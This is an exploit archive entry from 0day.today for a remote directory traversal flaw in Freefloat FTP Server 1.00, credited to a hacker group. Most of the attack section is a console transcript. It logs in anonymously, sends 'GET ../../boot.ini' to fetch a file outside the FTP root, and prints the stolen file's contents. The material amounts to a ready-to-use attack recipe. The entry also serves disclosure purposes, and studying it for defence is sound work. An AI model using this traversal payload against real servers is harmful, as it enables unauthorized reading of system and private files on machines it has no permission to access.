Freefloat FTP Server v1.00 Remote Directory Traversal

2010-12-07T00:00:00
ID 1337DAY-ID-15075
Type zdt
Reporter Yakir Wizman
Modified 2010-12-07T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            =====================================================
Freefloat FTP Server v1.00 Remote Directory Traversal
=====================================================

#     _             ____  __            __    ___
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / /
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/ 
#                   Live by the byte     |_/_/ 
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: [email protected]
#
# -----------------------------------
# Freefloat FTP Server is vulnerable for a path traversal, the following will explain you how to read files
# The vulnerability allows an unprivileged attacker to read files whom he has no permissions to.
# The vulnerable FTP command are:
# * GET     - Read  File
#-----------------------------------
# Vulnerability Title: Freefloat FTP Server v1.00 Remote Directory Traversal Vulnerability
# Date: 06/12/2010
# Author: Pr0T3cT10n
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Affected Version: 1.00
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
###
C:\Documents and Settings\Admin>ftp 127.0.0.1
Connected to 127.0.0.1.
220 FreeFloat Ftp Server (Version 1.00).
User (127.0.0.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> GET ../../boot.ini
200 PORT command successful.
150 Opening BINARY mode data connection for \boot.ini(211 bytes).
226 Transfer complete.
ftp: 211 bytes received in 0.00Seconds 211000.00Kbytes/sec.
ftp> bye
221 Goodbye
 
C:\Documents and Settings\Admin>type boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"
/noexecute=optin /fastdetect



#  0day.today [2018-01-02]  #